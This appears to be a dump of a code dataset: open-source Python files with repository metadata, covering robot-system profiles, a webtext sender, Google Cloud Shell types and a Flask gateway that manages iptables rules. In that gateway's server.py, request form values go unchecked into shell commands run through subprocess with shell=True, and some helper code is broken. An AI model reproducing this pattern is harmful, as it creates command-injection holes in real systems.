repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
gbiggs/rtsprofile
|
rtsprofile/message_sending.py
|
1
|
20553
|
# -*- Python -*-
# -*- coding: utf-8 -*-
'''rtsprofile
Copyright (C) 2009-2015
Geoffrey Biggs
RT-Synthesis Research Group
Intelligent Systems Research Institute,
National Institute of Advanced Industrial Science and Technology (AIST),
Japan
All rights reserved.
Licensed under the GNU Lesser General Public License version 3.
http://www.gnu.org/licenses/lgpl-3.0.en.html
File: message_sending.py
Objects for the message sending interface.
'''
__version__ = '$Revision: $'
# $Source$
from rtsprofile import RTS_NS, RTS_NS_S, RTS_EXT_NS, RTS_EXT_NS_S, \
RTS_EXT_NS_YAML, XSI_NS, XSI_NS_S
from rtsprofile.exceptions import InvalidParticipantNodeError
from rtsprofile.targets import TargetExecutionContext
from rtsprofile.utils import get_direct_child_elements_xml, \
indent_string, validate_attribute, \
string_types
##############################################################################
## MessageSending base object
class MessageSending(object):
'''Defines the orderings and conditions components in the RT system for
various actions.
'''
def __init__(self, targets=[]):
'''@param targets Orderings and conditions.'''
validate_attribute(targets, 'message_sending.Targets',
expected_type=list, required=False)
self._targets = targets
def __str__(self):
result = self.__class__.__name__ + '\n'
if self.targets:
result += 'Targets:\n'
for t in self.targets:
result += '{0}\n'.format(indent_string(str(t)))
return result[:-1] # Lop off the last new line
@property
def targets(self):
'''Orderings and conditions.'''
return self._targets
@targets.setter
def targets(self, targets):
validate_attribute(targets, 'message_sending.targets',
expected_type=list, required=False)
self._targets = targets
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a message sending object
into this object.
'''
self._targets = []
for c in node.getElementsByTagNameNS(RTS_NS, 'targets'):
if c.getElementsByTagNameNS(RTS_NS, 'WaitTime'):
new_target = WaitTime()
elif c.getElementsByTagNameNS(RTS_NS, 'Preceding'):
new_target = Preceding()
else:
new_target = Condition()
new_target.parse_xml_node(c)
self._targets.append(new_target)
return self
def parse_yaml(self, y):
'''Parse a YAML speficication of a message sending object into this
object.
'''
self._targets = []
if 'targets' in y:
for t in y['targets']:
if 'waitTime' in t['condition']:
new_target = WaitTime()
elif 'preceding' in t['condition']:
new_target = Preceding()
else:
new_target = Condition()
new_target.parse_yaml(t)
self._targets.append(new_target)
return self
def save_xml(self, doc, element):
'''Save this message_sending object into an xml.dom.Element object.'''
for cond in self._targets:
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'targets')
new_element.setAttributeNS(XSI_NS, XSI_NS_S + 'type', 'rtsExt:condition_ext')
cond.save_xml(doc, new_element)
element.appendChild(new_element)
def to_dict(self):
'''Save this message sending object into a dictionary.'''
targets = []
for cond in self._targets:
targets.append(cond.to_dict())
if targets:
return {'targets': targets}
else:
return {}
##############################################################################
## StartUp object
class StartUp(MessageSending):
'''Specifies the start order and conditions of components when the RT
system is started.
'''
pass
##############################################################################
## ShutDown object
class ShutDown(MessageSending):
'''Specifies the stop order and conditions of components when the RT system
is stopped.
'''
pass
##############################################################################
## Activation object
class Activation(MessageSending):
'''Specifies the activation order and conditions of components when the RT
system is activated.
'''
pass
##############################################################################
## Deactivation object
class Deactivation(MessageSending):
'''Specifies the deactivation order and conditions of components when the RT
system is deactivated.
'''
pass
##############################################################################
## Resetting object
class Resetting(MessageSending):
'''Specifies the reset order and conditions of components when the RT
system is reset.
'''
pass
##############################################################################
## Initialize object
class Initialize(MessageSending):
'''Specifies the initialisation order and conditions of components when the
RT system is initialised.
'''
pass
##############################################################################
## Finalize object
class Finalize(MessageSending):
'''Specifies the finalisation order and conditions of components when the
RT system is finalised.
'''
pass
##############################################################################
## Condition base object
class Condition(object):
'''Specifies execution orderings and conditions for RT components in the RT
system.
Execution conditions can include the time to wait before executing and
order of precedence for components. The involved RT component is specified
using @ref TargetExecutionContext.
'''
def __init__(self, sequence=0, target_component=TargetExecutionContext()):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
'''
validate_attribute(sequence, 'conditions.sequence',
expected_type=int, required=False)
self._sequence = sequence
validate_attribute(target_component, 'conditions.TargetComponent',
expected_type=TargetExecutionContext,
required=True)
self._target_component = target_component
self._properties = {}
def __str__(self):
result = 'Sequence: {0}\nTargetEC:\n{1}\n'.format(self.sequence,
indent_string(str(self.target_component)))
if self.properties:
result += 'Properties:\n'
for p in self.properties:
result += ' {0}: {1}\n'.format(p, self.properties[p])
return result[:-1] # Lop off the last new line
@property
def sequence(self):
'''The execution order of the target components for the various
actions.
'''
return self._sequence
@sequence.setter
def sequence(self, sequence):
validate_attribute(sequence, 'conditions.sequence',
expected_type=int, required=False)
self._sequence = sequence
@property
def target_component(self):
'''Target component of the condition.'''
return self._target_component
@target_component.setter
def target_component(self, target_component):
validate_attribute(target_component, 'conditions.TargetComponent',
expected_type=TargetExecutionContext,
required=True)
self._target_component = target_component
@property
def properties(self):
'''Miscellaneous properties.
Stores key/value pair properties.
Part of the extended profile.
'''
return self._properties
@properties.setter
def properties(self, properties):
validate_attribute(properties, 'conditions.ext.Properties',
expected_type=dict, required=False)
self._properties = properties
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a condition into this
object.
'''
self.sequence = int(node.getAttributeNS(RTS_NS, 'sequence'))
c = node.getElementsByTagNameNS(RTS_NS, 'TargetComponent')
if c.length != 1:
raise InvalidParticipantNodeError
self.target_component = TargetExecutionContext().parse_xml_node(c[0])
for c in get_direct_child_elements_xml(node, prefix=RTS_EXT_NS,
local_name='Properties'):
name, value = parse_properties_xml(c)
self._properties[name] = value
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a condition into this object.'''
self.sequence = int(y['sequence'])
self.target_component = \
TargetExecutionContext().parse_yaml(y['targetComponent'])
if RTS_EXT_NS_YAML + 'properties' in y:
for p in y.get(RTS_EXT_NS_YAML + 'properties'):
if 'value' in p:
value = p['value']
else:
value = None
self._properties[p['name']] = value
return self
def save_xml(self, doc, element):
'''Save this condition into an xml.dom.Element object.'''
element.setAttributeNS(RTS_NS, RTS_NS_S + 'sequence',
str(self.sequence))
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'TargetComponent')
self.target_component.save_xml(doc, new_element)
element.appendChild(new_element)
for p in self.properties:
new_prop_element = doc.createElementNS(RTS_EXT_NS,
RTS_EXT_NS_S + 'Properties')
properties_to_xml(new_prop_element, p, self.properties[p])
element.appendChild(new_prop_element)
def to_dict(self):
'''Save this condition into a dictionary.'''
d = {'sequence': self.sequence,
'targetComponent': self.target_component.to_dict()}
props = []
for name in self.properties:
p = {'name': name}
if self.properties[name]:
p['value'] = str(self.properties[name])
props.append(p)
if props:
d[RTS_EXT_NS_YAML + 'properties'] = props
return d
##############################################################################
## Preceding object
class Preceding(Condition):
'''Specifies that the target RT component should precede other RT
components that are part of the same action (e.g. activation) when that
action is executed.
'''
def __init__(self, sequence=0, target_component=TargetExecutionContext(),
timeout=0, sending_timing='', preceding_components=[]):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
@param timeout Status check timeout.
@type timeout int
@param sending_timing Timing for executing actions.
@type sending_timing str
@param preceding_components Preceding components of the condition.
@type preceding components list(TargetExecutionContext)
'''
super(Preceding, self).__init__(sequence, target_component)
validate_attribute(timeout, 'preceding.timeout',
expected_type=int, required=False)
self._timeout = timeout
validate_attribute(sending_timing, 'preceding.sendingTiming',
expected_type=string_types(), required=False)
self._sending_timing = sending_timing
validate_attribute(preceding_components,
'preceding.PrecedingComponents',
expected_type=list, required=False)
self._preceding_components = preceding_components
def __str__(self):
result = 'Timeout: {0}\nSending timing: {1}\n{2}'.format(self.timeout,
self.sending_timing, Condition.__str__(self))
if self.preceding_components:
for pc in self.preceding_components:
result += '\nPreceding component:\n{0}'.format(\
indent_string(str(pc)))
return result
@property
def timeout(self):
'''Time out for checking if the target component has executed the
action successfully.
Can be zero. Specified in milliseconds.
'''
return self._timeout
@timeout.setter
def timeout(self, timeout):
validate_attribute(timeout, 'preceding.timeout',
expected_type=int, required=False)
self._timeout = timeout
@property
def sending_timing(self):
'''Timing for executing actions.
Either wait for the preceding RT component to finish executing the
action (specified by "SYNC"), or execute the action without waiting for
the preceding RT component to finish (specified by "ASYNC"). When not
specified, the first option will be assumed.
'''
return self._sending_timing
@sending_timing.setter
def sending_timing(self, sending_timing):
validate_attribute(sending_timing, 'preceding.sendingTiming',
expected_type=string_types(), required=False)
self._sending_timing = sending_timing
@property
def preceding_components(self):
'''Preceding components of this condition.'''
return self._preceding_components
@preceding_components.setter
def preceding_components(self, preceding_components):
validate_attribute(sending_timing, 'preceding.PrecedingComponents',
expected_type=list, required=False)
self._preceding_components = preceding_components
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a preceding condition into
this object.
'''
super(Preceding, self).parse_xml_node(node)
p_nodes = node.getElementsByTagNameNS(RTS_NS, 'Preceding')
if p_nodes.length != 1:
raise InvalidParticipantNodeError
p_node = p_nodes[0]
if p_node.hasAttributeNS(RTS_NS, 'timeout'):
self.timeout = int(p_node.getAttributeNS(RTS_NS, 'timeout'))
else:
self.timeout = 0
if p_node.hasAttributeNS(RTS_NS, 'sendingTiming'):
self.sending_timing = p_node.getAttributeNS(RTS_NS, 'sendingTiming')
else:
self.sending_timing = 'ASYNC'
self._preceding_components = []
for c in p_node.getElementsByTagNameNS(RTS_NS, 'PrecedingComponents'):
self._preceding_components.append(TargetExecutionContext().parse_xml_node(c))
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a preceding condition into this
object.
'''
super(Preceding, self).parse_yaml(y)
c = y['condition']['preceding']
if 'timeout' in c:
self.timeout = int(c['timeout'])
else:
self.timeout = 0
if 'sendingTiming' in c:
self.sending_timing = c['sendingTiming']
else:
self.sending_timing = 'ASYNC'
self._preceding_components = []
if 'precedingComponents' in c:
for p in c.get('precedingComponents'):
self._preceding_components.append(TargetExecutionContext().parse_yaml(p))
return self
def save_xml(self, doc, element):
'''Save this preceding condition into an xml.dom.Element object.'''
super(Preceding, self).save_xml(doc, element)
pre_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'Preceding')
if self.timeout:
pre_element.setAttributeNS(RTS_NS, RTS_NS_S + 'timeout',
str(self.timeout))
if self.sending_timing:
pre_element.setAttributeNS(RTS_NS, RTS_NS_S + 'sendingTiming',
self.sending_timing)
for pc in self._preceding_components:
new_element = doc.createElementNS(RTS_NS,
RTS_NS_S + 'PrecedingComponents')
pc.save_xml(doc, new_element)
pre_element.appendChild(new_element)
element.appendChild(pre_element)
def to_dict(self):
'''Save this preceding condition into a dictionary.'''
d = super(Preceding, self).to_dict()
e = {}
if self.timeout != 0:
e['timeout'] = self.timeout
if self.sending_timing:
e['sendingTiming'] = self.sending_timing
pcs = []
for pc in self._preceding_components:
pcs.append(pc.to_dict())
if pcs:
e['precedingComponents'] = pcs
d['condition'] = {'preceding': e}
return d
##############################################################################
## WaitTime object
class WaitTime(Condition):
'''Specifies the time to wait before executing the specified action on the
target RT component. After the action command is received by the RT
component, it will wait the specified length of time before executing it.
'''
def __init__(self, wait_time=0, sequence=0,
target_component=TargetExecutionContext()):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
@param wait_time The length of time to wait, in milliseconds.
@type wait_time int
'''
super(WaitTime, self).__init__(sequence, target_component)
validate_attribute(wait_time, 'wait_time.waitTime',
expected_type=int, required=False)
self._wait_time = wait_time
def __str__(self):
return 'Wait time: {0}\n{1}'.format(self.wait_time,
Condition.__str__(self))
@property
def wait_time(self):
'''The length of time to wait before executing the specified action.
In milliseconds.
'''
return self._wait_time
@wait_time.setter
def wait_time(self, wait_time):
validate_attribute(wait_time, 'wait_time.waitTime',
expected_type=int, required=False)
self._wait_time = wait_time
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a wait_time condition into
this object.
'''
super(WaitTime, self).parse_xml_node(node)
wait_time_nodes = node.getElementsByTagNameNS(RTS_NS, 'WaitTime')
if wait_time_nodes.length != 1:
raise InvalidParticipantNodeError
self.wait_time = int(wait_time_nodes[0].getAttributeNS(RTS_NS,
'waitTime'))
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a wait_time condition into this
object.
'''
super(WaitTime, self).parse_yaml(y)
self.wait_time = int(y['condition']['waitTime']['waitTime'])
return self
def save_xml(self, doc, element):
'''Save this wait_time condition into an xml.dom.Element object.'''
super(WaitTime, self).save_xml(doc, element)
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'WaitTime')
new_element.setAttributeNS(RTS_NS, RTS_NS_S + 'waitTime',
str(self.wait_time))
element.appendChild(new_element)
def to_dict(self):
'''Save this wait_time condition into a dictionary.'''
d = super(WaitTime, self).to_dict()
d['condition'] = {'waitTime': {'waitTime': self.wait_time}}
return d
# vim: tw=79
|
lgpl-3.0
| 9,126,888,891,478,318,000 | 33.60101 | 89 | 0.57432 | false |
google/uncertainty-baselines
|
uncertainty_baselines/datasets/datasets_test.py
|
1
|
1049
|
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for get_dataset()."""
from absl.testing import parameterized
import tensorflow as tf
import uncertainty_baselines as ub
class DatasetsTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters('mnist', 'glue/cola')
def testGetDataset(self, name):
dataset = ub.datasets.get(name, split='train')
self.assertEqual(dataset.name, name)
if __name__ == '__main__':
tf.test.main()
|
apache-2.0
| 3,725,327,766,936,208,400 | 31.78125 | 74 | 0.744519 | false |
kevinarpe/kevinarpe-rambutan3
|
rambutan3/check_args/collection/RRangeSizeMatcher.py
|
1
|
2658
|
from rambutan3 import RArgs
from rambutan3.check_args.base.RAbstractTypeMatcher import RAbstractTypeMatcher
from rambutan3.check_args.base.traverse.RTypeMatcherError import RTypeMatcherError
from rambutan3.string.RMessageText import RMessageText
class RRangeSizeMatcher(RAbstractTypeMatcher):
"""
This class is fully tested.
"""
# noinspection PyMissingConstructor
def __init__(self, *, min_size: int=-1, max_size: int=-1):
self.__check_sizes(min_size=min_size, max_size=max_size)
self.__min_size = min_size
self.__max_size = max_size
@staticmethod
def __check_sizes(*, min_size: int, max_size: int):
RArgs.check_is_instance(min_size, int, 'min_size')
RArgs.check_is_instance(max_size, int, 'max_size')
if -1 == min_size and -1 == max_size:
raise ValueError("Both args 'min_size' and 'max_size' are -1")
if min_size < -1:
raise ValueError("Arg 'min_size' must be >= -1: {}".format(min_size))
if max_size < -1:
raise ValueError("Arg 'max_size' must be >= -1: {}".format(max_size))
if -1 != min_size and -1 != max_size and min_size > max_size:
raise ValueError("Arg 'min_size' > arg 'max_size': {} > {}".format(min_size, max_size))
# @override
def matches(self, collection, matcher_error: RTypeMatcherError=None) -> bool:
try:
size = len(collection)
except TypeError as e:
# TypeError: object of type 'xyz' has no len()
if matcher_error:
matcher_error.add_failed_match(self, collection, RMessageText(str(e)))
return False
if (-1 == self.__min_size or size >= self.__min_size) \
and (-1 == self.__max_size or size <= self.__max_size):
return True
if matcher_error:
matcher_error.add_failed_match(self, collection, RMessageText('Actual size is {}'.format(size)))
return False
# @override
def __eq__(self, other) -> bool:
if not isinstance(other, RRangeSizeMatcher):
return False
x = ((self.__min_size == other.__min_size) and (self.__max_size == other.__max_size))
return x
# @override
def __hash__(self) -> int:
x = hash((self.__min_size, self.__max_size))
return x
# @override
def __str__(self):
x = ''
if -1 != self.__min_size:
x += 'size >= {}'.format(self.__min_size)
if -1 != self.__max_size:
if x:
x += ' and '
x += 'size <= {}'.format(self.__max_size)
x = ' where ' + x
return x
|
gpl-3.0
| -1,375,920,728,825,385,700 | 33.973684 | 108 | 0.565839 | false |
timmyomahony/python-parsnip
|
parsnip/__init__.py
|
1
|
4250
|
import urllib
import urllib2
import cookielib
from lxml import etree
DEBUG = False
VERSION = "0.0.1"
import logging
logger = logging.getLogger(__name__)
if DEBUG:
logging.basicConfig(level=logging.DEBUG)
from parsnip import utils
class Webtext(object):
"""
Represents a webtext to be sent to a list of recipients. It does some simple
validation and formatting on the provided message and recipients.
"""
def __init__(self, message, recipients):
if not isinstance(message, str):
raise AttributeError("The message must be a string")
else:
if len(message) is 0:
raise AttributeError("The message string provided was empty")
self.message = utils.make_string_safe(message)
if not isinstance(recipients, list):
try:
recipients = utils.csv_to_list(recipients)
except:
raise AttributeError("Provided recipients were not in a list and could not be converted.")
recipients = utils.clean_list(recipients)
if len(recipients) is 0:
raise AttributeError("No recipients in the list")
self.recipients = recipients
class BaseConnection(object):
"""
A wrapper around URLLib concerned with the sending & receiving of messages to the mobile operators
websites. Also responsible for the managing of cookies.
"""
def __init__(self):
self.cookies = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookies))
def send(self,url, data=None, headers=None):
"""
"""
if data:
data = urllib.urlencode(data)
if not headers:
headers = {
"Referer":"http://www.google.com",
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0) Gecko/20100101 Firefox/4.0"
}
request = urllib2.Request(url=url, data=data, headers=headers)
return self.opener.open(request).read()
class BaseWebtexter(object):
""" """
MAX_LENGTH = 128
MAX_RECIPIENTS = 24
def __init__(self, phone_number, pin, *args, **kwargs):
self.phone_number = phone_number
self.pin = pin
self.remaining_webtexts = None
self.connection = BaseConnection()
def login(self):
raise NotImplementedError()
def logout(self):
if self.LOGOUT_POST:
self.connection.send(self.LOGOUT_POST)
self.connection.cookies.clear()
def _do_send(self, message_chunk, recipient_list_chunk):
"""
This should be overwritten to provide the actual network specific logic for sending a single message.
Parameters:
- message_chunk : is a string that is less then `self.MAX_LENGTH` chars
- recipient_list_chunk : is a list with less then `self.MAX_RECIPIENTS` entries
"""
raise NotImplementedError()
def send(self, message, recipients):
"""
Front-facing sending wrapper to send a message to a list (or comma separated string) of phone numbers. This
method automatically breaks the message and recipient list into smaller chunks if they are bigger then the
network provider can deal with (depending on what has been set in self.MAX_LENGTH and self.MAX_RECIPIENTS)
Parameters:
- message : a string of any length
- recipients : a comma separated string or a list of strings containing the phone numbers to send to.
"""
webtext = Webtext(message, recipients)
for message_chunk in utils.chunk(webtext.message, self.MAX_LENGTH):
for recipient_chunk in utils.chunk(webtext.recipients, self.MAX_RECIPIENTS):
self._do_send(message_chunk, recipient_chunk)
return True
def get_remaining_webtexts(self):
raise NotImplementedError()
def __unicode__(self):
return u"%s-%s" %(self.is_operator, self.phone_number)
def __str__(self):
return u"%s-%s" %(self.is_operator, self.phone_number)
import operators
def get_webtexter(network_name, phone_number, pin):
"""
Factory function to create webtexters given a string representing the operator (e.g. 'Meteor'/'O2')
"""
for cls in BaseWebtexter.__subclasses__():
if cls.is_operator(unicode(network_name)):
return cls(phone_number, pin)
raise ValueError, "Webtexter for %s has not been implemented" % network_name
|
mit
| 8,747,260,817,803,172,000 | 33 | 111 | 0.702588 | false |
Hernanarce/pelisalacarta
|
python/version-command-line/platformcode/platformtools.py
|
1
|
1188
|
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# platformtools
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
from core import config
def dialog_ok(heading, line1, line2="", line3=""):
return True
def dialog_notification(heading, message, icon=0, time=5000, sound=True):
pass
def dialog_yesno(heading, line1, line2="", line3="", nolabel="No", yeslabel="Si", autoclose=""):
return True
def dialog_select(heading, list):
return -1
def dialog_progress(heading, line1, line2="", line3=""):
return None
def dialog_progress_bg(heading, message=""):
return None
def dialog_input(default="", heading="", hidden=False):
return None
def dialog_numeric(type, heading, default=""):
return None
def itemlist_refresh():
pass
def itemlist_update(item):
pass
def render_items(itemlist, parentitem):
pass
def is_playing():
return None
def play_video(item):
pass
def show_channel_settings(list_controls=None, dict_values=None, caption="", callback=None, item=None):
return None
def show_recaptcha(key, referer):
return None
|
gpl-3.0
| 9,129,338,694,733,797,000 | 21.433962 | 102 | 0.637205 | false |
googleapis/python-shell
|
google/cloud/shell/__init__.py
|
1
|
2691
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.shell_v1.services.cloud_shell_service.client import (
CloudShellServiceClient,
)
from google.cloud.shell_v1.services.cloud_shell_service.async_client import (
CloudShellServiceAsyncClient,
)
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyMetadata
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyRequest
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyResponse
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentResponse
from google.cloud.shell_v1.types.cloudshell import CloudShellErrorDetails
from google.cloud.shell_v1.types.cloudshell import CreateEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import DeleteEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import Environment
from google.cloud.shell_v1.types.cloudshell import GetEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyMetadata
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyRequest
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyResponse
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentResponse
__all__ = (
"CloudShellServiceClient",
"CloudShellServiceAsyncClient",
"AddPublicKeyMetadata",
"AddPublicKeyRequest",
"AddPublicKeyResponse",
"AuthorizeEnvironmentMetadata",
"AuthorizeEnvironmentRequest",
"AuthorizeEnvironmentResponse",
"CloudShellErrorDetails",
"CreateEnvironmentMetadata",
"DeleteEnvironmentMetadata",
"Environment",
"GetEnvironmentRequest",
"RemovePublicKeyMetadata",
"RemovePublicKeyRequest",
"RemovePublicKeyResponse",
"StartEnvironmentMetadata",
"StartEnvironmentRequest",
"StartEnvironmentResponse",
)
|
apache-2.0
| 7,066,398,266,885,760,000 | 42.403226 | 79 | 0.808993 | false |
rahulbahal7/cloud-gateway
|
server.py
|
1
|
7070
|
from flask import Flask, render_template, request, g
import os
import subprocess
import requests
import sqlite3
import yaml
app = Flask(__name__)
dnat_cmd = "sudo iptables -t nat %s PREROUTING -d %s -j DNAT --to-destination %s"
port_fwd_cmd = "sudo iptables -t nat %s PREROUTING -p %s -d %s --dport %s -j DNAT --to-destination %s"
internet_cmd = "sudo iptables -t nat %s POSTROUTING ! -d %d -j MASQUERADE"
internet_tag_file = "./internet_conn_on"
# Override default database setting
net_config = yaml.load(open('config.yaml').read())
app.config.update(dict(
DATABASE = os.path.join(app.root_path, 'database.db'),
DEBUG = True,
SLAVE_URL = ("http://%s:%s") % (net_config["VcgIp"], net_config["VcgServicePort"])
))
#########################
# DATABASE RELATED CODE #
#########################
def init_db():
if not os.path.isfile(app.config['DATABASE']):
# create database file
path, file_name = os.path.split(app.config['DATABASE'])
if not os.path.isdir(path):
os.makedirs(path)
open(file_name, 'a').close()
# init tables
conn = sqlite3.connect(app.config['DATABASE'])
cur = conn.cursor()
cur.execute("create table dnats (ori_ip text, real_ip text)")
cur.execute("create table port_fwds (dport text, dst text, protocol text)")
conn.commit()
conn.close()
def connect_to_database():
return sqlite3.connect(app.config['DATABASE'])
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = connect_to_database()
return db
def execute_sql(query, params):
conn = get_db()
conn.cursor().execute(query, params)
conn.commit()
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
#############
# HOME PAGE #
#############
@app.route("/")
def index():
# return all exsiting dnat rules
dnats = get_db().cursor().execute("SELECT * FROM dnats")
# return all existing port forwarding rules
port_fwds = get_db().cursor().execute("SELECT * FROM port_fwds")
return render_template("index.html", dnats=dnats, port_fwds=port_fwds, internet_state=str(internet_on()))
@app.route("/dnat", methods=['GET', 'POST', 'DELETE'])
def dnat():
if request.method == 'GET':
cur = get_db().cursor()
return cur.execute("SELECT * FROM dnats")
elif request.method == 'POST':
ori_ip = request.form['ori_ip']
real_ip = request.form['real_ip']
# send put request boboboto slave vcg
# rsp = requests.post(app.config["SLAVE_URL"] + '/dnat', data = request.form)
# # if fail
# if rsp.content != "succ":
# return rsp.content
# execute rule add locally
# write new rules into database
#dnats = get_db().cursor().execute("SELECT * FROM dnats")
#port_fwds = get_db().cursor().execute("SELECT * FROM port_fwds")
execute_sql('insert into dnats values (?,?)', (ori_ip, real_ip,))
#return render_template("index.html",dnats=dnats, port_fwds=port_fwds)
return "success"
elif request.method == 'DELETE':
ori_ip = request.form['ori_ip']
real_ip = request.form['real_ip']
# params = {"ori_ip" : ori_ip, "real_ip" : real_ip}
# send delete request to slave vcg
# rsp = requests.delete(app.config["SLAVE_URL"] + '/dnat', data = params)
# if fail
# if rsp.content != "succ":
# return rsp.content
# execute rule delete locally
# del_dnat(ori_ip, real_ip)
# del_arp(real_ip)
# print params
# delete rule into database
execute_sql('DELETE FROM dnats WHERE ori_ip=? and real_ip=?', (ori_ip, real_ip,))
return "success"
@app.route("/port_fwd", methods=['GET', 'POST', 'DELETE'])
def port_fwd():
if request.method == 'POST':
try:
dport = request.form['dport']
dst = request.form['dst']
protocol = request.form['protocol']
# print request.form
add_port_fwd(protocol, dport, dst)
# rule into database
execute_sql('insert into port_fwds values (?, ?, ?)', (dport, dst, protocol))
return "success"
except Exception as e:
return str(e)
elif request.method == 'DELETE':
try:
print request.form
dport = request.form['dport']
dst = request.form['dst']
protocol = request.form['protocol'].strip()
#del_port_fwd(proto, dport, dst)
execute_sql('DELETE FROM port_fwds WHERE dport=? and dst=? and protocol=?', (dport, dst, protocol,))
print "haha1"
return "success"
except Exception as e:
return str(e)
@app.route("/toggle_internet", methods=['GET', 'POST'])
def toggle_internet():
if request.method == 'GET':
cur = get_db().cursor()
return cur.execute("SELECT * FROM internet")
elif request.method == 'POST':
try:
flag = request.form['flag']
if flag=="True": disable_internet()
else: enable_internet()
execute_sql('UPDATE internet SET status=?', (not flag,))
return "success"
except Exception as e:
return str(e)
###################
# HELPER FUNCTION #
###################
def add_dnat(ori, new):
return subprocess.call(dnat_cmd % ("-A", ori, new), shell = True) == 0
def del_dnat(ori, new):
return subprocess.call(dnat_cmd % ("-D", ori, new), shell = True) == 0
def add_arp(ip, dev = "eth0"):
"""
A a fake static arp for given ip address to ensure DNAT sucecess
Note : DNAT will need mac addr for destination ip addr
"""
cmd = ("arp -i %s -s %s 11:50:22:44:55:55") % (dev, ip)
return subprocess.call(cmd, shell = True) == 0
def del_arp(ip):
return subprocess.call(["arp -d ", ip], shell = True) == 0
def add_port_fwd(proto, dport, dst):
cmd = port_fwd_cmd % ("-A", proto,"10.0.1.122", dport, dst)
return subprocess.check_output(cmd, shell = True)
def del_port_fwd(proto, dport, dst):
cmd = port_fwd_cmd % ("-D", proto,"10.0.1.122", dport, dst)
return subprocess.check_output(cmd, shell = True)
def internet_on():
return os.path.isfile(internet_tag_file)
def enable_internet():
print "INTERNET ENABLED"
# create a file to indicate the state of internet connection
if not os.path.isfile(internet_tag_file):
open(internet_tag_file, "a").close()
total_subnet = ",".join([net_config["HqCidr"],net_config["VpcCidr"]])
cmd = internet_cmd % ('-A', total_subnet)
return exeute_shell(cmd)
def disable_internet():
print "INTERNET DISABLED"
if os.path.isfile(internet_tag_file):
os.remove(internet_tag_file)
total_subnet = ",".join([net_config["HqCidr"],net_config["VpcCidr"]])
cmd = internet_cmd % ('-D', total_subnet)
return exeute_shell(cmd)
if __name__ == "__main__":
init_db()
app.run(host='0.0.0.0',port=int(net_config['VcgServicePort']))
|
apache-2.0
| 7,519,551,738,405,763,000 | 30.283186 | 112 | 0.591372 | false |
fbradyirl/home-assistant
|
tests/components/script/test_init.py
|
1
|
9084
|
"""The tests for the Script component."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch, Mock
import pytest
from homeassistant.components import script
from homeassistant.components.script import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
SERVICE_RELOAD,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
EVENT_SCRIPT_STARTED,
)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.loader import bind_hass
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.exceptions import ServiceNotFound
from tests.common import get_test_home_assistant
ENTITY_ID = "script.test"
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
